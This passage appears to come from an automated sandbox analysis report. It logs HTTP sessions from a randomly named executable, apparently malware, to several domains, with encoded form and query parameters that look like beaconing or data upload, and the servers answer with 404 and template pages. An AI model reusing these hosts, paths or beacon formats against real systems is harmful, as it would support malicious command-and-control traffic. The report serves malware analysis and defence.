                                                    Data Raw: 4c 34 4d 6c 3d 70 71 6a 4e 46 35 50 42 77 4d 43 55 70 59 75 74 52 70 6f 35 69 5a 52 77 61 72 39 52 72 36 63 51 56 79 75 43 42 59 4d 4a 43 69 37 74 52 4e 4e 32 36 4c 42 6b 6b 4a 32 2b 48 4a 50 45 31 68 70 64 57 39 56 66 57 4f 42 33 65 58 63 30 4b 79 31 4b 53 2f 53 77 45 66 66 30 63 7a 68 39 2b 31 34 6b 77 78 48 42 5a 70 64 6d 35 2b 78 68 59 55 35 46 63 75 52 4d 6a 4a 4d 76 6d 5a 68 6b 45 47 53 63 69 5a 47 41 5a 32 4a 55 31 6a 61 57 50 69 55 33 56 61 34 6c 56 6e 41 76 30 6e 38 78 36 32 39 4c 49 66 65 36 43 63 78 74 2f 34 62 51 52 6a 62 77 48 41 58 33 2b 50 49 79 79 6d 76 2f 61 41 4d 51 76 70 45 33 39 34 41 50 63 53 46 64 4e 4e 41 4e 54 52 42 44 54 69 54 77 57 67 61 70 70 2b 49 42 49 42 4f 73 2b 73 33 72 44 6a 72 51 4b 4e 53 41 6d 78 35 37 6b 61 6e 56 31 4c 4c 55 34 4e 75 37 4f 47 70 55 56 35 63 34 65 36 32 30 38 50 49 58 64 66 6b 38 79 4a 45 4b 39 74 67 47 71 4d 2b 66 4d 65 55 50 4d 6d 52 6e 34 73 59 30 33 2b 56 4b 4d 31 36 65 62 47 32 47 48 66 59 52 58 32 4b 58 68 6a 74 63 65 37 70 6f 50 44 79 47 65 [TRUNCATED]
                                                    Data Ascii: L4Ml=pqjNF5PBwMCUpYutRpo5iZRwar9Rr6cQVyuCBYMJCi7tRNN26LBkkJ2+HJPE1hpdW9VfWOB3eXc0Ky1KS/SwEff0czh9+14kwxHBZpdm5+xhYU5FcuRMjJMvmZhkEGSciZGAZ2JU1jaWPiU3Va4lVnAv0n8x629LIfe6Ccxt/4bQRjbwHAX3+PIyymv/aAMQvpE394APcSFdNNANTRBDTiTwWgapp+IBIBOs+s3rDjrQKNSAmx57kanV1LLU4Nu7OGpUV5c4e6208PIXdfk8yJEK9tgGqM+fMeUPMmRn4sY03+VKM16ebG2GHfYRX2KXhjtce7poPDyGeO20vudDFZdGJ4QsLlWMHS+xbrXO/3juAgSoKf2Apo+0kLx580PdW28hAksKGowNyjK1WHqxQn0EepaNVWuU41m1AHCKnql3qiNBLGtlcWWsc3FVv+W6zEkjM/Oyohg5COLtwQL0guLcuqIGpSLVrIfFqyLFtWljVVcUoye36xtYwQJEepkEFom/gOKMcIHi78reRpv44/qzmn0ggq5CPbtvkn7fwc8HWchBQwlsRSY6MTkbQWrwF3UtMzkx3cNNwmQj8ltmrEfQpvp0omxD6mupjphE2Rw7iteGOOdvHJx6pPMq4/vdlAKDH+IkjuEwK3jvPqaqWJvkzXdIpGgN9A2pyOp0T3viDsAbfpdpAiSWmugOkEERCRNCe5xJbUP9OWxMTkTZpQOC6RMESoRd3ZWve6jzU4ZqxvSHYObz0oaRbNHzbJp60sfFoZs3pjC6nFBz59F9rz0cblOYRTtqIg1I3TzqQxDGw/fLS9+EdtB+ts0AOOLoXoPTflZQHBLOHATv70mmLG5dF/wk4r/v1GmomAlAeSHTEMHKHTUrJAlCy/WsiVzrwsWb1yHaiYm8j0JH8q/ugsMojLK39nCuA/v4pJFXqGxbwkHgF44ye8iO/A3PRdwg/COfVpKqQyyFUjgN4pfMlR3QciIvcnoPaJvGWP1txOI5jAS [TRUNCATED]
                                                    Sep 24, 2024 17:18:21.234181881 CEST1236INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 1238
                                                    date: Tue, 24 Sep 2024 15:18:21 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                    Sep 24, 2024 17:18:21.234220028 CEST240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                    Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.863708148.251.114.233806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:18:23.145906925 CEST467OUTGET /30vc/?L4Ml=koLtGNOu6/mtotP2N90Ew8ZnZ5AtrYolTy+nHYpgZByzVo0p/pJDl5mHD5S71z13e/5SfuBUTFBQZBIfTtXqOOjASHRAzkUFzB/tE7NVhPpefWhKcPM/9ZcforBBDyLF2Q==&VX=XZGx- HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Host: www.eslameldaramlly.site
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Sep 24, 2024 17:18:23.778836966 CEST1236INHTTP/1.1 404 Not Found
                                                    Connection: close
                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                    pragma: no-cache
                                                    content-type: text/html
                                                    content-length: 1238
                                                    date: Tue, 24 Sep 2024 15:18:23 GMT
                                                    server: LiteSpeed
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;"
                                                    Sep 24, 2024 17:18:23.778867006 CEST240INData Raw: 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62
                                                    Data Ascii: href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.863709209.74.95.29806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:18:28.849875927 CEST716OUTPOST /gfz9/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.pofgof.pro
                                                    Origin: http://www.pofgof.pro
                                                    Referer: http://www.pofgof.pro/gfz9/
                                                    Content-Length: 205
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 4f 47 71 6c 4d 62 59 4c 64 38 50 4a 6d 76 34 6f 6c 45 37 44 56 62 61 42 46 63 6b 4c 54 6b 46 74 4e 6e 54 32 34 2b 4f 79 37 2b 55 6a 76 38 77 61 31 47 44 33 4c 68 35 62 57 34 50 73 43 75 71 68 71 42 6d 71 61 6e 4e 37 4a 4a 6e 35 5a 4b 7a 69 78 6d 36 51 48 45 32 61 69 51 73 43 76 68 37 6f 2f 66 4e 63 47 37 4a 43 45 66 7a 58 54 4b 58 68 76 43 37 62 49 68 45 31 4c 67 50 52 76 44 61 64 41 38 56 65 58 79 47 45 47 46 34 30 4c 4c 67 63 47 76 48 7a 39 33 51 45 55 42 76 65 6c 33 4e 73 7a 71 78 31 59 63 57 75 62 46 66 4d 36 4a 39 4c 34 73 48 4c 6a 6b 59 30 6c 2b 70 32 54 52 33 6f 4e 64 39 6c 72 70 59 3d
                                                    Data Ascii: L4Ml=OGqlMbYLd8PJmv4olE7DVbaBFckLTkFtNnT24+Oy7+Ujv8wa1GD3Lh5bW4PsCuqhqBmqanN7JJn5ZKzixm6QHE2aiQsCvh7o/fNcG7JCEfzXTKXhvC7bIhE1LgPRvDadA8VeXyGEGF40LLgcGvHz93QEUBvel3Nszqx1YcWubFfM6J9L4sHLjkY0l+p2TR3oNd9lrpY=
                                                    Sep 24, 2024 17:18:29.444363117 CEST1236INHTTP/1.1 404 Not Found
                                                    Date: Tue, 24 Sep 2024 15:18:29 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 13928
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                    Sep 24, 2024 17:18:29.444406033 CEST224INData Raw: 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d
                                                    Data Ascii: > <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet -->
                                                    Sep 24, 2024 17:18:29.444422960 CEST1236INData Raw: 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61
                                                    Data Ascii: <link href="css/style.css" rel="stylesheet"></head><body> <div class="container-xxl bg-white p-0"> ... Spinner Start --> <div id="spinner" class="show bg-white position-fixed translate-middle w-100 vh-100 top
                                                    Sep 24, 2024 17:18:29.444458961 CEST1236INData Raw: 73 70 61 6e 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 2d 69 63 6f 6e 22 3e 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                    Data Ascii: span class="navbar-toggler-icon"></span> </button> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav ms-auto"> <a href="index.html"
                                                    Sep 24, 2024 17:18:29.444477081 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 74 65 73 74 69 6d 6f 6e 69 61 6c 2e 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 3e 54 65 73 74 69 6d 6f 6e 69 61 6c 3c 2f
                                                    Data Ascii: <a href="testimonial.html" class="dropdown-item">Testimonial</a> <a href="404.html" class="dropdown-item active">404 Error</a> </div> </
                                                    Sep 24, 2024 17:18:29.444495916 CEST1236INData Raw: 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 34 30 34 20 45 72 72 6f 72 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6f 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                    Data Ascii: ia-current="page">404 Error</li> </ol> </nav> </div> <div class="col-md-6 animated fadeIn"> <img class="img-fluid" src="img/header.jpg" alt=""
                                                    Sep 24, 2024 17:18:29.444514990 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 33 22 3e 50 72 6f 70 65 72 74 79 20 54 79 70 65 20 33 3c 2f 6f 70 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                    Data Ascii: <option value="3">Property Type 3</option> </select> </div> <div class="col-md-4"> <select class="fo
                                                    Sep 24, 2024 17:18:29.444648981 CEST1236INData Raw: 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 65 61 72 63 68 20 45 6e 64 20 2d 2d 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 34 30 34 20
                                                    Data Ascii: </div> </div> ... Search End --> ... 404 Start --> <div class="container-xxl py-5 wow fadeInUp" data-wow-delay="0.1s"> <div class="container text-center"> <div cla
                                                    Sep 24, 2024 17:18:29.444825888 CEST224INData Raw: 65 20 6d 62 2d 34 22 3e 47 65 74 20 49 6e 20 54 6f 75 63 68 3c 2f 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61
                                                    Data Ascii: e mb-4">Get In Touch</h5> <p class="mb-2"><i class="fa fa-map-marker-alt me-3"></i>123 Street, New York, USA</p> <p class="mb-2"><i class="fa fa-phone-alt me-3"></i>+012 345
                                                    Sep 24, 2024 17:18:29.444842100 CEST1236INData Raw: 36 37 38 39 30 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 65 6c 6f 70 65 20 6d 65 2d 33 22 3e
                                                    Data Ascii: 67890</p> <p class="mb-2"><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" href=""><i c
                                                    Sep 24, 2024 17:18:29.449450970 CEST1236INData Raw: 20 26 20 43 6f 6e 64 69 74 69 6f 6e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d
                                                    Data Ascii: & Condition</a> </div> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Photo Gallery</h5> <div class="row g-2 pt-2">


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.863710209.74.95.29806360C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 24, 2024 17:18:31.402606010 CEST736OUTPOST /gfz9/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-us
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.pofgof.pro
                                                    Origin: http://www.pofgof.pro
                                                    Referer: http://www.pofgof.pro/gfz9/
                                                    Content-Length: 225
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                    Data Raw: 4c 34 4d 6c 3d 4f 47 71 6c 4d 62 59 4c 64 38 50 4a 6e 50 49 6f 70 46 37 44 5a 72 61 47 62 73 6b 4c 5a 45 46 70 4e 6e 66 32 34 38 6a 70 37 4d 77 6a 75 63 67 61 30 48 44 33 49 68 35 62 59 59 4f 6b 64 2b 71 75 71 42 6a 56 61 69 74 37 4a 4e 50 35 5a 50 58 69 79 58 36 54 46 55 32 59 76 77 73 54 68 42 37 6f 2f 66 4e 63 47 37 4e 34 45 62 66 58 55 36 4c 68 73 6a 37 59 42 42 45 32 62 41 50 52 72 44 61 6e 41 38 56 38 58 7a 62 52 47 48 41 30 4c 4b 51 63 46 36 72 30 6b 48 51 4b 51 42 76 4d 6a 32 63 54 2b 62 6b 61 56 64 54 4a 63 58 50 2b 79 66 51 68 69 4f 50 4e 67 6b 77 66 6c 39 42 41 57 6d 71 41 58 2b 74 56 31 2b 50 63 59 32 57 53 65 48 6b 57 7a 76 71 53 47 5a 36 59 77 2f 71 4b
                                                    Data Ascii: L4Ml=OGqlMbYLd8PJnPIopF7DZraGbskLZEFpNnf248jp7Mwjucga0HD3Ih5bYYOkd+quqBjVait7JNP5ZPXiyX6TFU2YvwsThB7o/fNcG7N4EbfXU6Lhsj7YBBE2bAPRrDanA8V8XzbRGHA0LKQcF6r0kHQKQBvMj2cT+bkaVdTJcXP+yfQhiOPNgkwfl9BAWmqAX+tV1+PcY2WSeHkWzvqSGZ6Yw/qK
                                                    Sep 24, 2024 17:18:31.988761902 CEST1236INHTTP/1.1 404 Not Found
                                                    Date: Tue, 24 Sep 2024 15:18:31 GMT
                                                    Server: Apache
                                                    X-Frame-Options: SAMEORIGIN
                                                    Content-Length: 13928
                                                    X-XSS-Protection: 1; mode=block
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                    Sep 24, 2024 17:18:31.988818884 CEST1236INData Raw: 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 6c 69 62 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 61 73 73 65 74 73 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d
                                                    Data Ascii: > <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="cs
                                                    Sep 24, 2024 17:18:31.988858938 CEST448INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6d 2d 30 20 74 65 78 74 2d 70 72 69 6d 61 72 79 22 3e 4d 61 6b 61 61 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20
                                                    Data Ascii: <h1 class="m-0 text-primary">Makaan</h1> </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-
